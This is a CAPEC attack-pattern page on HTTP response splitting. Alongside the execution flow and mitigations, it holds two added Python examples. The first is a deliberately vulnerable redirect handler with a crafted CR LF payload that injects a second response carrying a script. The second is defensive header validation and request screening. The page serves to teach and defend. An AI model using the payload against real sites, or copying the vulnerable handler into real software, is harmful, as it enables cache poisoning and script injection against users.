CAPEC-34: HTTP Response Splitting
CAPEC Version: 3.9
Last Updated: 2023-01-24
Attack Pattern Description
Execution Flow
Step 1 Explore
[Survey network to identify target] The adversary performs network reconnaissance, monitoring relevant traffic to identify the network path and how HTTP messages are parsed along it, with the goal of identifying potential targets.
- Scan networks to fingerprint the HTTP infrastructure, and monitor HTTP traffic with a tool such as a network protocol analyzer to map the HTTP network path (proxies, caches, load balancers, origin servers).
Step 1 Experiment
[Identify vulnerabilities in targeted HTTP infrastructure and technologies] The adversary sends a variety of benign or ambiguous HTTP requests and observes the responses from each HTTP agent in the path, looking for discrepancies in how requests are interpreted and parsed: supported HTTP protocol versions, handling of HTTP headers, syntax checking, and input filtering (in particular, whether a user-supplied value that the server copies into a response header is checked for CR and LF characters).
Step 2 Experiment
[Cause differential HTTP responses by experimenting with identified HTTP request vulnerabilities] The adversary sends a maliciously crafted HTTP request to the back-end HTTP infrastructure in order to inject adversary-controlled data into its HTTP responses. The injected data takes the form of HTTP headers with custom strings, and of embedded web scripts and objects, and is aimed at the intermediary and/or front-end client/victim HTTP agents that communicate with the back-end. The goal is to interfere with how those agents parse the response: a line break injected into a header value ends the legitimate response early, and the bytes that follow are parsed as a second, adversary-supplied response. The adversary observes the effect of the crafted request on the intermediary and client/victim agents to confirm that the identified vulnerability is usable in the planned attack.
- Continue monitoring HTTP traffic.
- Reflect a CR LF sequence (or a bare LF, which many lenient parsers accept) through a user-controlled value that the server copies into a response header, for example a redirect target placed in the Location header, and check whether the client or intermediary treats the bytes after it as the start of a second response.
Step 1 Exploit
[Perform HTTP Response Splitting attack] Using the knowledge gained in the Experiment phase, inject a crafted header value so that the server's response is split in two, and the second, adversary-controlled response is delivered to the victim's client or stored by an intermediary cache, causing one of the consequences listed below.
- Leverage the techniques identified in the Experiment phase.
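The execution flow above describes the mechanism in words; the following is an added example, written for this page and not taken from CAPEC or any vendor, that shows it in code. A constructed redirect handler copies the `next` query parameter into the Location header without validation, and a constructed minimal HTTP/1.1 framer plays the role of a keep-alive client reading messages off the connection. The request-line format, handler name and payload are all assumptions made for the illustration.

```python
"""Added example (constructed, not CAPEC's or any vendor's code):
HTTP response splitting through an unvalidated redirect target."""
from urllib.parse import parse_qs, quote, urlsplit

INJECTED_BODY = "<script>alert(1)</script>"  # attacker's second-response body


def vulnerable_redirect(request_line: str) -> bytes:
    """Deliberately vulnerable 302 handler: the raw 'next' parameter is
    concatenated into the Location header. parse_qs percent-decodes, so
    %0d%0a sent on the wire arrives here as a real CR LF."""
    target = request_line.split(" ", 2)[1]
    next_url = parse_qs(urlsplit(target).query).get("next", ["/"])[0]
    response = (
        "HTTP/1.1 302 Found\r\n"
        "Location: " + next_url + "\r\n"
        "Content-Length: 0\r\n"
        "Connection: keep-alive\r\n"
        "\r\n"
    )
    return response.encode("latin-1")


def crafted_request() -> str:
    """Constructed attacker request: the CR LF after the URL closes the
    Location header, 'Content-Length: 0' plus a blank line ends the first
    response, and everything after it is a complete second response."""
    injection = (
        "http://example.com/\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: text/html\r\n"
        f"Content-Length: {len(INJECTED_BODY)}\r\n"
        "\r\n"
        f"{INJECTED_BODY}"
    )
    return f"GET /redirect?next={quote(injection, safe='')} HTTP/1.1"


def benign_request() -> str:
    return f"GET /redirect?next={quote('/account', safe='')} HTTP/1.1"


def split_responses(raw: bytes) -> list:
    """Minimal HTTP/1.1 response framer (constructed): reads consecutive
    messages from one keep-alive connection using Content-Length, the way
    a browser or cache does before matching them to queued requests.
    Trailing bytes that do not start with a status line (here, the
    server's own leftover headers) are discarded as junk."""
    messages = []
    pos = 0
    while pos < len(raw):
        head_end = raw.find(b"\r\n\r\n", pos)
        if head_end < 0:
            break
        lines = raw[pos:head_end].decode("latin-1").split("\r\n")
        status = lines[0]
        if not status.startswith("HTTP/"):
            break
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        length = int(headers.get("content-length", "0"))
        body_start = head_end + 4
        messages.append({
            "status": status,
            "headers": headers,
            "body": raw[body_start:body_start + length],
        })
        pos = body_start + length
    return messages


if __name__ == "__main__":
    for req in (benign_request(), crafted_request()):
        msgs = split_responses(vulnerable_redirect(req))
        print(len(msgs), "response(s):", [m["status"] for m in msgs])
```

With the benign request the framer sees one 302. With the crafted request it sees the 302 followed by a 200 whose body is the attacker's script; on a shared connection or in a cache that second message is paired with the next request, which is where the cross-user and cache-poisoning consequences come from.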
Prerequisites
- A vulnerable or compromised server or domain/site that allows the adversary to insert/inject malicious content which will appear in the server's response to the target HTTP agents (e.g., proxies and users' web browsers).
- Differences in the way two HTTP agents in the path parse and interpret HTTP responses and their headers.
- HTTP response headers whose values can be manipulated by the user, typically because a request parameter is copied into them without CR/LF filtering.
- HTTP agents running HTTP/1.0 or HTTP/1.1 with keep-alive connections, pipelined requests, and chunked requests and responses, so that the injected second response can be matched to a subsequent request on the same connection.
Skills Required
Resources Required
- Tools capable of monitoring HTTP messages, crafting malicious HTTP messages, and/or injecting malicious content into HTTP messages.
Consequences
Scope: Confidentiality, Integrity, Availability
Technical Impact: Execute Unauthorized Commands
Scope: Confidentiality, Access Control, Authorization
Technical Impact: Gain Privileges
Scope: Integrity
Technical Impact: Modify Data
Mitigations
Design: Evaluate HTTP agents prior to deployment for parsing/interpretation discrepancies.
Configuration: Front-end HTTP agents should detect ambiguous requests and refuse to forward them.
Configuration: Back-end HTTP agents should reject ambiguous requests and close the network connection.
Configuration: Disable reuse of back-end connections.
Configuration: Use HTTP/2 for back-end connections.
Configuration: Use the same web server software for the front-end and back-end servers.
Implementation: Utilize a Web Application Firewall (WAF) that has built-in mitigation to detect abnormal requests/responses.
Configuration: Install the latest vendor security patches available for both intermediary and back-end HTTP infrastructure (i.e., proxies and web servers).
Configuration: Ensure that all HTTP infrastructure in the chain or network path uses a strict, uniform parsing process.
Implementation: Utilize intermediary HTTP infrastructure capable of filtering and/or sanitizing user input; in particular, reject or encode CR and LF characters before any user-supplied value is placed in a response header.
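The mitigations above are stated as configuration goals; the following added example, written for this page and not taken from CAPEC or any vendor, shows the two checks in code. `safe_header` is the back-end side: it refuses to serialize a header whose value contains CR, LF or NUL, which is the behaviour a hardened redirect handler relies on. `request_target_is_suspicious` is the front-end/WAF side: it flags a request target that carries an encoded CR or LF in a parameter, including a double-encoded form that a back-end might decode twice. All function and exception names are assumptions made for the illustration.

```python
"""Added example (constructed, not CAPEC's or any vendor's code):
back-end header validation and front-end request screening against
response splitting."""
from urllib.parse import unquote


class HeaderInjection(ValueError):
    """Raised when a header name or value would break the header block."""


def safe_header(name: str, value: str) -> str:
    """Serialize 'Name: value', refusing CR, LF and NUL instead of
    emitting them. A bare LF is enough for many lenient parsers, so both
    line-break characters are rejected, not just the CR LF pair."""
    for ch in ("\r", "\n", "\x00"):
        if ch in name or ch in value:
            raise HeaderInjection(f"control character in header {name!r}")
    return f"{name}: {value}"


def build_redirect(next_url: str) -> bytes:
    """Hardened redirect: the user-controlled target is validated by
    safe_header before the response is assembled, so an injected line
    break aborts the response instead of splitting it."""
    lines = [
        "HTTP/1.1 302 Found",
        safe_header("Location", next_url),
        safe_header("Content-Length", "0"),
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1")


def request_target_is_suspicious(target: str, max_decode: int = 2) -> bool:
    """Front-end check: percent-decode the request target up to
    max_decode times (to catch %250d%250a style double encoding) and
    report whether a CR or LF appears at any stage."""
    s = target
    for _ in range(max_decode):
        if "\r" in s or "\n" in s:
            return True
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return "\r" in s or "\n" in s


if __name__ == "__main__":
    print(build_redirect("/account"))
    try:
        build_redirect("http://example.com/\r\nSet-Cookie: session=attacker")
    except HeaderInjection as exc:
        print("rejected:", exc)
    print(request_target_is_suspicious("/redirect?next=%2Faccount"))
    print(request_target_is_suspicious("/redirect?next=x%0d%0aSet-Cookie%3A%20a%3Db"))
```

The back-end check is the one that removes the vulnerability; the front-end check only narrows the attack surface, since an encoding the screen does not decode (or a bare LF a particular parser accepts) can still get through, which is why the page recommends a strict, uniform parser along the whole path rather than filtering alone.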
Taxonomy Mappings
| Taxonomy Name | Entry ID | Entry Name |
|---|---|---|
| WASC | 25 | HTTP Response Splitting |